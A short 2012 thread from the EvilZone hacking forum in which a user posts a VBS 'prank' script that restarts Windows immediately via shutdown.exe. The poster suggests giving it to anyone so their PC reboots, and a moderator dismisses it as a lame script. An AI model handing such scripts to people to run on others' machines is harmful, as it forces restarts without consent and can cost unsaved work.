EvilZone

Programming and Scripting => Scripting Languages => Topic started by: Pak_Track on July 21, 2012, 07:46:07 PM

Title: Windows restart script
Post by: Pak_Track on July 21, 2012, 07:46:07 PM
ive got a pretty fun prank u can use on friends.

Open notepad, copy paste the code below and save it anything.vbs

Code: (vbs) [Select]
Option Explicit
Dim objShell
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run "C:\WINDOWS\system32\shutdown.exe -r -t 0"


give it to anyone and their pc will reboot

 
Title: Re: Windows restart script
Post by: Kulverstukas on July 21, 2012, 08:03:46 PM
Moved to scripting languages, because it's just a lame VBS script, does not belong in hacking and security forum.
Also for any code that you post, put it in a "code" tag!
Title: Re: Windows restart script
Post by: iTpHo3NiX on July 22, 2012, 12:17:24 AM
asdf